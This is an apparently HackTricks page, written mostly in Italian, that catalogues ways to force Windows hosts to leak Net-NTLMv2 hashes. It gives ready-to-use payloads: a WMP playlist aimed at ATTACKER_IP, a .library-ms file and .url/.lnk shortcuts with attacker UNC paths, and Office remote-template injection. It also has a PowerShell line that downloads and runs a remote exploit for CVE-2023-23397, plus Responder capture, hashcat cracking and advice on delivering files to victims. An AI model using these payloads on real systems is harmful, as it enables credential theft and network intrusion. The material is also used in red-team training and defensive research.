Luoghi per rubare NTLM creds
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al đŹ gruppo Discord o al gruppo telegram o seguici su Twitter đŚ @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
Consulta tutte le ottime idee da https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ â dal download di un file Microsoft Word online alla sorgente degli ntlm leak: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md e https://github.com/p0dalirius/windows-coerced-authentication-methods
Playlist di Windows Media Player (.ASX/.WAX)
Se riesci a far aprire o visualizzare in anteprima a un target una playlist di Windows Media Player che controlli, puoi provocare un leak di NetâNTLMv2 puntando la voce verso un percorso UNC. WMP tenterĂ di recuperare il media referenziato tramite SMB e si autenticherĂ implicitamente.
Esempio di payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
Flusso di raccolta e cracking:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer gestisce in modo insicuro i file .library-ms quando vengono aperti direttamente allâinterno di un archivio ZIP. Se la definizione della library punta a un percorso UNC remoto (es., \attacker\share), il semplice navigare/avviare il .library-ms allâinterno dello ZIP fa sĂŹ che Explorer interroghi lâUNC ed emetta lâautenticazione NTLM allâattaccante. Questo produce un NetNTLMv2 che può essere cracked offline o potenzialmente relayed.
Esempio minimo di .library-ms che punta a un percorso UNC dellâattaccante
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Passaggi operativi
- Create the .library-ms file with the XML above (set your IP/hostname).
- Zip it (on Windows: Send to â Compressed (zipped) folder) and deliver the ZIP to the target.
- Run an NTLM capture listener and wait for the victim to open the .library-ms from inside the ZIP.
Percorso del suono del promemoria del calendario di Outlook (CVE-2023-23397) â zeroâclick NetâNTLMv2 leak
Microsoft Outlook for Windows processed the extended MAPI property PidLidReminderFileParameter in calendar items. If that property points to a UNC path (e.g., \attacker\share\alert.wav), Outlook would contact the SMB share when the reminder fires, leaking the userâs NetâNTLMv2 without any click. This was patched on March 14, 2023, but itâs still highly relevant for legacy/untouched fleets and for historical incident response.
Sfruttamento rapido con PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
Lato Listener:
sudo responder -I eth0 # or impacket-smbserver to observe connections
Note
- Una vittima ha bisogno solamente che Outlook for Windows sia in esecuzione quando il promemoria viene attivato.
- Il leak restituisce NetâNTLMv2 adatto per offline cracking o relay (non passâtheâhash).
.LNK/.URL basato su icona zeroâclick NTLM leak (CVEâ2025â50154 â bypass di CVEâ2025â24054)
Windows Explorer visualizza automaticamente le icone dei collegamenti. Recenti ricerche hanno mostrato che anche dopo la patch di Microsoft di aprile 2025 per UNCâicon shortcuts, era ancora possibile innescare lâautenticazione NTLM senza click ospitando la destinazione del collegamento su un percorso UNC e mantenendo lâicona locale (bypass della patch assegnato CVEâ2025â50154). La sola visualizzazione della cartella fa sĂŹ che Explorer recuperi i metadata dalla destinazione remota, emettendo NTLM verso il server SMB dellâattaccante.
Payload minimo per Internet Shortcut (.url):
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
Payload collegamento programma (.lnk) via PowerShell:
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
ModalitĂ di consegna
- Metti lo shortcut in un ZIP e fai in modo che la vittima lo esplori.
- Posiziona lo shortcut su una share scrivibile che la vittima aprirĂ .
- Combina con altri file esca nella stessa cartella in modo che Explorer ne mostri lâanteprima.
Office remote template injection (.docx/.dotm) to coerce NTLM
I documenti Office possono fare riferimento a un template esterno. Se imposti il template allegato su un percorso UNC, lâapertura del documento effettuerĂ lâautenticazione verso SMB.
Minimal DOCX relationship changes (inside word/):
- Modifica word/settings.xml e aggiungi il riferimento al template allegato:
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- Modifica word/_rels/settings.xml.rels e punta rId1337 al tuo UNC:
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- Ricrea in .docx e consegna. Avvia il tuo SMB capture listener e attendi lâapertura.
Per idee post-capture su relaying o abuso di NTLM, consulta:
Riferimenti
- HTB Fluffy â ZIP .libraryâms auth leak (CVEâ2025â24071/24055) â GenericWrite â AD CS ESC16 to DA (0xdf)
- HTB: Media â WMP NTLM leak â NTFS junction to webroot RCE â FullPowers + GodPotato to SYSTEM
- Morphisec â 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC â Microsoft mitigates Outlook EoP (CVEâ2023â23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate â Zeroâclick, one NTLM: Microsoft security patch bypass (CVEâ2025â50154)
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al đŹ gruppo Discord o al gruppo telegram o seguici su Twitter đŚ @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
HackTricks

